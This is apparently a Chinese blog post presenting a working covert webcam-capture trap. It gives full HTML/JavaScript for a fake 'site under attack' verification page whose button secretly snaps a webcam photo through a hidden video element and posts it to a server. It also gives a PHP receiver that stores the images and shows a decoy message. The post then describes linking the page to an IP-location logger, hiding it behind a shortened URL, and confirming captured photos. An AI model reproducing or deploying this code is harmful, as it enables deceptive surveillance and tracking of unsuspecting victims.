突发奇想的思路,既然可以记录IP我为什么不可以更方便些,顺手偷拍攻击对象,看看他长啥样!
因为事先已经有了IP记录平台,所以方便省事,直接开始研究偷拍
随手写了偷拍页面前端,伪造的受攻击验证(将就看,毕竟只是做一次演示)
Post引用
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>人机验证机制</title>
<meta name='Generator' content='EditPlus'>
<meta name="viewport" content="width=device-width, user-scalable=no,initial-scale=1, minimal-ui">
<meta name='Description' content='inveted by: http://davidwalsh.name/browser-camera'>
<script type="text/javascript" src="http://apps.bdimg.com/libs/jquery/2.1.1/jquery.js"></script>
<style>
html body{width: 100%;height:auto;margin:0 auto 0px;padding:0 0 0px;background-color: #444 }
a{text-decoration:none; }
.wenzi{width: 300px;height: 300px; margin-right: auto;margin-left: auto; }
.yuyan{width: 100% ; height: 150px ; color: #fff; margin-top: 60px; text-align: center;}
.sf{width: 100%;height: 150px; line-height: 150px ;text-align: center;}
.sf a{display: block;font-size: 12px;margin-left: 28%; text-decoration: none; text-align: center;background-color: #EBEBEB; width: 50px;height: 20px;line-height: 20px; border:solid 1px #222; float: left; }
.sf button{display: block; font-size: 13px; margin-left: 10px ; text-align: center;background-color: #EBEBEB; width: 50px;height: 22px; border:solid 1px #222; float: left;}
</style>
<script>
window.addEventListener("DOMContentLoaded", function() {
// Grab elements, create settings, etc.
var canvas = document.getElementById('canvas');
var context = canvas.getContext('2d');
var video = document.getElementById('video');
var mediaConfig = { video: true };
var errBack = function(e) {
console.log('An error has occurred!', e)
};
// Put video listeners into place
if(navigator.mediaDevices && navigator.mediaDevices.getUserMedia) {
navigator.mediaDevices.getUserMedia(mediaConfig).then(function(stream) {
video.src = window.URL.createObjectURL(stream);
video.play();
});
}
/* Legacy code below! */
else if(navigator.getUserMedia) { // Standard
navigator.getUserMedia(mediaConfig, function(stream) {
video.src = stream;
video.play();
}, errBack);
} else if(navigator.webkitGetUserMedia) { // WebKit-prefixed
navigator.webkitGetUserMedia(mediaConfig, function(stream){
video.src = window.webkitURL.createObjectURL(stream);
video.play();
}, errBack);
} else if(navigator.mozGetUserMedia) { // Mozilla-prefixed
navigator.mozGetUserMedia(mediaConfig, function(stream){
video.src = window.URL.createObjectURL(stream);
video.play();
}, errBack);
}
// Trigger photo take
document.getElementById('snap').addEventListener('click', function() {
context.drawImage(video, 0, 0, 640, 480);
var url = canvas.toDataURL('image/png');
document.getElementById('result').value = url;
var uu=url.substr(22);
$(document).ready(function(){
$.ajax({
cache: true,
type: "POST",
url:"jieshou.php",
data:$('#tp').serialize(),
async: false,
error: function(request) {
alert("Connection error");
},
success: function(data) {
$(".return").parent().html(data);
}
});
});
});
}, false);
</script>
</head>
<body>
<div class="wenzi">
<div class="yuyan">
目前平台正在遭受攻击!
<br/>
<br/>
显示非正常请使用UC浏览器访问!
</div>
<div class="sf">
<button id='snap'>确定</button>
</div>
</div>
<div>
<video id='video' width='0' height='0'></video>
<canvas style="width:0px;height:0px" id='canvas' width='640' height='480'></canvas>
<form id="tp" action="./jieshou.php" method="post">
<input type="hidden" type="file" value="sdgsdg" id="demo_input" />
<input type="hidden" name="img" id="result" value="" />
<p id="img_area"></p>
<input type="hidden" type="submit" value="提交">
</form>
</div>
<div class= "return"></div>
</body>
</html>
jishu.php
<?php
error_reporting(0);
$base64_img = trim($_POST['img']);
$up_dir = './upload/';//存放在当前目录的upload文件夹下
if(!file_exists($up_dir)){
mkdir($up_dir,0777);
}
if(preg_match('/^(data:\s*image\/(\w+);base64,)/', $base64_img, $result)){
$type = $result[2];
if(in_array($type,array('pjpeg','jpeg','jpg','gif','bmp','png'))){
$new_file = $up_dir.date('YmdHis_').'.'.$type;
if(file_put_contents($new_file, base64_decode(str_replace($result[1], '', $base64_img)))){
$img_path = str_replace('../../..', '', $new_file);
echo '网站正在遭受攻击,请稍后访问';
}
}
}
绑定域名并存放至根目录前往ip.heibai.org生成定位链接
(因为平台都是我的,所以我可以自由修改定位链接内容!!!如果要实践定位链接请自行搭建)
马赛克部分为偷拍地址,设置1秒跳转
百度短网址生成链接,开始测试阶段
IP记录成功,接下来是激动人心的时刻,看看是否偷拍成功
查看了我的图片存放目录,成功了的
嗯,对,证明我的思路是可行的。
本文仅作为思路分享。
请规范用途!